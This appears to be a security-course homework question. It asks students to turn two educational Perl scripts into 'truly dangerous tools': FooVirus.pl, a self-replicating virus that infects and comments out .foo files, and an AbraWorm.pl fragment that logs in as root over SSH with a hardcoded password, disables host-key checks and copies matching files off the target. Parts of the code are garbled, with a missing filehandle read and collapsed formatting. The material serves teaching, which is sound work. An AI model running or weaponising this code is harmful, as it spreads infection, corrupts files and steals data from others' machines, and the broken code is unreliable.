Question.

The best tools against malware are built by those good guys who have the ability to think like the bad guys. [One reason why it is so easy to do bad deeds on the Internet is that its foundational protocols were designed by genuinely good people who could never have imagined that there would be people out there who might want to make their living through identity theft, credit-card theft, incessant spamming, etc.] So think about how you can modify the code in FooVirus.pl and Abraworm.pl to turn these scripts into truly dangerous tools.

________________________________________

!/usr/bin/perl ### FooVirus.pl ### Author: Avi Kak (kak@purdue.edu) ### Date: April 19, 2006

print " HELLO FROM FooVirus ";

print "This is a demonstration of how easy it is to write "; print "a self-replicating program. This virus will infect "; print "all files with names ending in .foo in the directory "; print "which you execute an infected file. If you send an "; print "infected file to someone else and they execute it, their, "; print ".foo files will be damged also. ";

print "Note that this is a safe virus (for educational purpose "; print "only) since it does not carry a harmful payload. All it "; print "does is to print out the message and comment out the "; print "code in .foo files. ";

open IN, "< $0"; my $virus; for (my $i=0;$i<37;$i++){ $virus .= ; } foreach my $file ( glob "*.foo") { open IN, "< $file"; my @all_of_it = ; close IN; next if (join '', @all_of_it) =~ /foovirus/m; chmod 0777, $file; open OUT, "> $file"; print OUT "$virus"; map s/^$_/#$_/, @all_of_it; print OUT @all_of_it; close OUT; } _________________________________________________

Abraworm.pl

#!/usr/bin/perl -w use strict; use Net::OpenSSH;

use vars qw/$opt $ip_address $user $passwd/; $opt = [-o => "UserKnownHostsFile /dev/null", -o => "HostbasedAuthentication no", -o => "HashKnownHosts no", -o => "ChallengeResponseAuthentication no", -o => "VerifyHostKeyDNS no", -o => "StrictHostKeyChecking no" ];

$ip_address = "172.31.57.46"; $user = "root"; $passwd = "myawsec2!!!";

my $ssh = Net::OpenSSH->new($ip_address, user => $user, passwd => $passwd, master_opts => $opt, timeout => 5, ctl_dir => '/tmp');

my $cmd = 'ls -l'; my (@out, $err) = $ssh->capture({ timeout => 10 }, $cmd ); foreach my $item (@out) { print $item; } if ((join '', @out) =~ /AbraWorm\.pl/m) { print " The target machine is already infected "; } else { print " The target machine is not infected yet "; }

$cmd = 'grep abracadabra *'; (@out, $err) = $ssh->capture({ timeout => 10 }, $cmd ); #print $ssh->error if $ssh->error;

my @files_of_interest_at_target; foreach my $item (@out) { print $item; $item =~ /^(.+):.+$/; push @files_of_interest_at_target, $1; } if (@files_of_interest_at_target) { foreach my $target_file (@files_of_interest_at_target) { print $target_file; $ssh->scp_get($target_file, '/home/y.zheng65'); } }